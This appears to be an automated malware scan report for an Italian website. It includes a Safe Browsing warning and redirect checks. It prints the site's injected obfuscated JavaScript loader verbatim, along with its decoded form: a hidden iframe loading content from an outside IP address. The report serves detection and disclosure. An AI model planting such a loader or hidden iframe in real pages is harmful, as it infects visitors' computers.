Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=siottopintor.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.siottopintor.it/ | 200 OK Content-Length: 1924 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[X1hI\"ZQQFx;;/T.m3z.mH/.H3;`nl;`Y(i9.FZF\"[XQ_oiI\"!`X`~`o`Q_x[Z`((iYp[(`XFo5_x[YSYi\"><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D')); Decoded script: function decrypt(n){var l,ch,ind,q="",key="OD&:x9T6H@fBAC#y_wgloSEb~K [chZei`a5z-{jv!Pk|r1mnYU}qV7/;pF]sXG=ILtQJ0u\'2Md(4*";for(l=0;l<n.length;l++){ch=n.charAt(l);ind=key.indexOf(ch);if(ind>-1){if(ind==0){ind =79}q+=key.charAt(ind-1)} else {q+=ch}};document.write(q)} function decrypt(n){var l,ch,ind,q="",key="OD&:x9T6H@fBAC#y_wgloSEb~K [chZei`a5z-{jv!Pk|r1mnYU}qV7/;pF]sXG=ILtQJ0u\'2Md(4*";for(l=0;l<n.length;l++){ch=n.charAt(l);ind=key.indexOf(ch);if(ind>-1){if(ind==0){ind =79}q+=key.charAt(ind-1)} else {q+=ch}};document.write(q)} <iframe src="http://79.135.167.63/img/index.php" style="visibility: hidden; display: none"></iframe> Antivirus reports:
| ||
http://www.siottopintor.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: siottopintor.it
Result:
GET / HTTP/1.1
Host: siottopintor.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: siottopintor.it
Referer: http://www.google.com/search?q=siottopintor.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: siottopintor.it
Referer: http://www.google.com/search?q=siottopintor.it
Result:
The result is similar to the first query. There are no suspicious redirects found.